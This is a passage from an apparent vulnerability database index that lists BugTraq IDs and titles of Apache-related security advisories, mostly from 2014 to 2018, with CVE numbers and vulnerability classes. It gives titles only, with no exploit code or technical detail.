5370| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
5371| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
5372| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
5373| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
5374| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
5375| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
5376| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
5377| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
5378| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
5379| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
5380| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
5381| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
5382| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
5383| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
5384| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
5385| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
5386| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
5387| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
5388| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
5389| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
5390| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
5391| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
5392| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
5393| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
5394| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
5395| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
5396| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
5397| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
5398| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
5399| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
5400| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
5401| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
5402| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
5403| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
5404| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
5405| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
5406| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
5407| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
5408| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
5409| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
5410| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
5411| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
5412| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
5413| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
5414| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
5415| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
5416| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
5417| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
5418| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
5419| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
5420| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
5421| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
5422| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
5423| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
5424| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
5425| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
5426| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
5427| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
5428| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
5429| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
5430| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
5431| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
5432| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
5433| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
5434| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
5435| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
5436| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
5437| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
5438| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
5439| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
5440| [100447] Apache2Triad Multiple Security Vulnerabilities
5441| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
5442| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
5443| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
5444| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
5445| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
5446| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
5447| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
5448| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
5449| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
5450| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
5451| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
5452| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
5453| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
5454| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
5455| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
5456| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
5457| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
5458| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
5459| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
5460| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
5461| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
5462| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
5463| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
5464| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
5465| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
5466| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
5467| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
5468| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
5469| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
5470| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
5471| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
5472| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
5473| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
5474| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
5475| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
5476| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
5477| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
5478| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
5479| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
5480| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
5481| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
5482| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
5483| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
5484| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
5485| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
5486| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
5487| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
5488| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
5489| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
5490| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
5491| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
5492| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
5493| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
5494| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
5495| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
5496| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
5497| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
5498| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
5499| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
5500| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
5501| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
5502| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
5503| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
5504| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
5505| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
5506| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
5507| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
5508| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
5509| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
5510| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
5511| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
5512| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
5513| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
5514| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
5515| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
5516| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
5517| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
5518| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
5519| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
5520| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
5521| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
5522| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
5523| [95675] Apache Struts Remote Code Execution Vulnerability
5524| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
5525| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
5526| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
5527| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
5528| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
5529| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
5530| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
5531| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
5532| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
5533| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
5534| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
5535| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
5536| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
5537| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
5538| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
5539| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
5540| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
5541| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
5542| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
5543| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
5544| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
5545| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
5546| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
5547| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
5548| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
5549| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
5550| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
5551| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
5552| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
5553| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
5554| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
5555| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
5556| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
5557| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
5558| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
5559| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
5560| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
5561| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
5562| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
5563| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
5564| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
5565| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
5566| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
5567| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
5568| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
5569| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
5570| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
5571| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
5572| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
5573| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
5574| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
5575| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
5576| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
5577| [91736] Apache XML-RPC Multiple Security Vulnerabilities
5578| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
5579| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
5580| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
5581| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
5582| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
5583| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
5584| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
5585| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
5586| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
5587| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
5588| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
5589| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
5590| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
5591| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
5592| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
5593| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
5594| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
5595| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
5596| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
5597| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
5598| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
5599| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
5600| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
5601| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
5602| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
5603| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
5604| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
5605| [90482] Apache CVE-2004-1387 Local Security Vulnerability
5606| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
5607| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
5608| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
5609| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
5610| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
5611| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
5612| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
5613| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
5614| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
5615| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
5616| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
5617| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
5618| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
5619| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
5620| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
5621| [86399] Apache CVE-2007-1743 Local Security Vulnerability
5622| [86397] Apache CVE-2007-1742 Local Security Vulnerability
5623| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
5624| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
5625| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
5626| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
5627| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
5628| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
5629| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
5630| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
5631| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
5632| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
5633| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
5634| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
5635| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
5636| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
5637| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
5638| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
5639| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
5640| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
5641| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
5642| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
5643| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
5644| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
5645| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
5646| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
5647| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
5648| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
5649| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
5650| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
5651| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
5652| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
5653| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
5654| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
5655| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
5656| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
5657| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
5658| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
5659| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
5660| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
5661| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
5662| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
5663| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
5664| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
5665| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
5666| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
5667| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
5668| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
5669| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
5670| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
5671| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
5672| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
5673| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
5674| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
5675| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
5676| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
5677| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
5678| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
5679| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
5680| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
5681| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
5682| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
5683| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
5684| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
5685| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
5686| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
5687| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
5688| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
5689| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
5690| [76933] Apache James Server Unspecified Command Execution Vulnerability
5691| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
5692| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
5693| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
5694| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
5695| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
5696| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
5697| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
5698| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
5699| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
5700| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
5701| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
5702| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
5703| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
5704| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
5705| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
5706| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
5707| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
5708| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
5709| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
5710| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
5711| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
5712| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
5713| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
5714| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
5715| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
5716| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
5717| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
5718| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
5719| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
5720| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
5721| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
5722| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
5723| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
5724| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
5725| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
5726| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
5727| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
5728| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
5729| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
5730| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
5731| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
5732| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
5733| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
5734| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
5735| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
5736| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
5737| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
5738| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
5739| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
5740| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
5741| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
